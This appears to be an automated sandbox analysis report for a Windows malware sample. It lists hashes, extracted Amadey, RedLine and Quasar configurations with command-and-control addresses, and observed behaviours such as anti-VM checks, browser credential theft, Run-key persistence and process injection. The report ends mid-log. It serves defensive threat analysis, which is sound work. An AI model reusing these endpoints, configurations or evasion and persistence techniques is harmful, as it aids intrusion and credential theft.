Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system -
submitted
31-07-2024 01:05
Static task
static1
Behavioral task
behavioral1
Sample
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
Resource
win10v2004-20240730-en
General
-
Target
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
-
Size
1.8MB
-
MD5
c015c231f5d013a7031748f95129a969
-
SHA1
27f74431dbaa7b8bd16a5ddc0b871da65ea62849
-
SHA256
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4
-
SHA512
baf6f0d3752e49ad769325bde85129d803094ea42e9d9735eafb3f415014e6d2f07a977d8892fef85307bc80e0060f0ef3c364ef3b6d05a0d4324956723a194e
-
SSDEEP
49152:AsoGdXqMpDQe+xIfJJzbTR4O8/t76/rhCDfpIrs:poGtqMpU9KhF6OB/rIDpI
Malware Config
Extracted
amadey
4.41
0657d1
http://185.215.113.19
-
install_dir
0d8f5eb8a7
-
install_file
explorti.exe
-
strings_key
6c55a5f34bb433fbd933a168577b1838
-
url_paths
/Vi9leo/index.php
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
exodusmarket.io
91.92.240.111:1334
Extracted
quasar
1.4.1
Office04
51.222.21.20:4782
374acc94-a8cd-45c6-bc31-752e0f83541d
-
encryption_key
5B2A5F50FABB3F6748116D7077D95758D0DFFC77
-
install_name
svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchost
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\adada.exe family_quasar behavioral2/memory/7868-1460-0x0000000000A30000-0x0000000000D54000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5748-540-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5748-540-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
Processes:
axplong.exeexplorti.exeexplorti.exe0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeexplorti.exeaxplong.exeaxplong.exeexplorti.exe879432f808.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 879432f808.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorti.exeexplorti.exeaxplong.exeaxplong.exe0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeexplorti.exe879432f808.exeaxplong.exeexplorti.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 879432f808.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 879432f808.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
471a98aee8.exe879432f808.exeaxplong.exeRegAsm.exedropperrr.exe0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeexplorti.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation 471a98aee8.exe Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation 879432f808.exe Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation dropperrr.exe Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation explorti.exe -
Executes dropped EXE 14 IoCs
Processes:
explorti.exe471a98aee8.exea2f7c1badc.exeexplorti.exe879432f808.exeaxplong.exedeepweb.exepureee.exeadada.exedropperrr.exeaxplong.exeexplorti.exeaxplong.exeexplorti.exepid process 3116 explorti.exe 1492 471a98aee8.exe 5692 a2f7c1badc.exe 5700 explorti.exe 5224 879432f808.exe 5064 axplong.exe 1492 deepweb.exe 6300 pureee.exe 7868 adada.exe 8000 dropperrr.exe 8964 axplong.exe 8956 explorti.exe 8564 axplong.exe 8548 explorti.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeaxplong.exeexplorti.exeaxplong.exeexplorti.exeexplorti.exeexplorti.exe879432f808.exeaxplong.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine 879432f808.exe Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine axplong.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
explorti.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\471a98aee8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\471a98aee8.exe" explorti.exe Set value (str) \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a2f7c1badc.exe = "C:\\Users\\Admin\\1000029002\\a2f7c1badc.exe" explorti.exe -
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exeflow pid process 192 7412 msiexec.exe 194 7412 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Drops file in System32 directory 2 IoCs
Processes:
chrome.exedescription ioc process File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeexplorti.exeexplorti.exea2f7c1badc.exe879432f808.exeaxplong.exeaxplong.exeexplorti.exeaxplong.exeexplorti.exepid process 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe 3116 explorti.exe 5700 explorti.exe 5692 a2f7c1badc.exe 5224 879432f808.exe 5064 axplong.exe 8964 axplong.exe 8956 explorti.exe 8564 axplong.exe 8548 explorti.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
deepweb.exepureee.exedescription pid process target process PID 1492 set thread context of 5748 1492 deepweb.exe RegAsm.exe PID 6300 set thread context of 8348 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 8164 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 8900 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 7992 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 9188 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 4228 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 8136 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 6276 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 6728 6300 pureee.exe AddInProcess.exe PID 6300 set thread context of 6620 6300 pureee.exe AddInProcess.exe -
Drops file in Windows directory 2 IoCs
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe879432f808.exedescription ioc process File created C:\Windows\Tasks\explorti.job 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe File created C:\Windows\Tasks\axplong.job 879432f808.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 6216 5692 WerFault.exe a2f7c1badc.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
a2f7c1badc.exe879432f808.exeaxplong.exeRegAsm.exe471a98aee8.exeexplorti.exedeepweb.exedropperrr.exe0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a2f7c1badc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 879432f808.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 471a98aee8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorti.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language deepweb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dropperrr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 2 IoCs
Processes:
firefox.exedropperrr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000_Classes\Local Settings dropperrr.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeexplorti.exemsedge.exemsedge.exechrome.exeexplorti.exe879432f808.exeaxplong.exeRegAsm.exepureee.exeaxplong.exeexplorti.exepid process 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe 3116 explorti.exe 3116 explorti.exe 888 msedge.exe 888 msedge.exe 848 msedge.exe 848 msedge.exe 2348 chrome.exe 2348 chrome.exe 5700 explorti.exe 5700 explorti.exe 5224 879432f808.exe 5224 879432f808.exe 5064 axplong.exe 5064 axplong.exe 5748 RegAsm.exe 5748 RegAsm.exe 5748 RegAsm.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 8964 axplong.exe 8964 axplong.exe 8956 explorti.exe 8956 explorti.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exechrome.exepid process 848 msedge.exe 848 msedge.exe 848 msedge.exe 2348 chrome.exe 2348 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exefirefox.exeRegAsm.exeadada.exedescription pid process Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeDebugPrivilege 1056 firefox.exe Token: SeDebugPrivilege 1056 firefox.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeDebugPrivilege 5748 RegAsm.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeDebugPrivilege 7868 adada.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exefirefox.exemsedge.exechrome.exepid process 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
firefox.exemsedge.exechrome.exepid process 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
firefox.exea2f7c1badc.exepid process 1056 firefox.exe 5692 a2f7c1badc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeexplorti.exe471a98aee8.execmd.exechrome.exemsedge.exefirefox.exefirefox.exedescription pid process target process PID 4788 wrote to memory of 3116 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe explorti.exe PID 4788 wrote to memory of 3116 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe explorti.exe PID 4788 wrote to memory of 3116 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe explorti.exe PID 3116 wrote to memory of 1492 3116 explorti.exe 471a98aee8.exe PID 3116 wrote to memory of 1492 3116 explorti.exe 471a98aee8.exe PID 3116 wrote to memory of 1492 3116 explorti.exe 471a98aee8.exe PID 1492 wrote to memory of 4860 1492 471a98aee8.exe cmd.exe PID 1492 wrote to memory of 4860 1492 471a98aee8.exe cmd.exe PID 4860 wrote to memory of 2348 4860 cmd.exe chrome.exe PID 4860 wrote to memory of 2348 4860 cmd.exe chrome.exe PID 4860 wrote to memory of 848 4860 cmd.exe msedge.exe PID 4860 wrote to memory of 848 4860 cmd.exe msedge.exe PID 4860 wrote to memory of 5064 4860 cmd.exe firefox.exe PID 4860 wrote to memory of 5064 4860 cmd.exe firefox.exe PID 2348 wrote to memory of 752 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 752 2348 chrome.exe chrome.exe PID 848 wrote to memory of 4648 848 msedge.exe msedge.exe PID 848 wrote to memory of 4648 848 msedge.exe msedge.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe 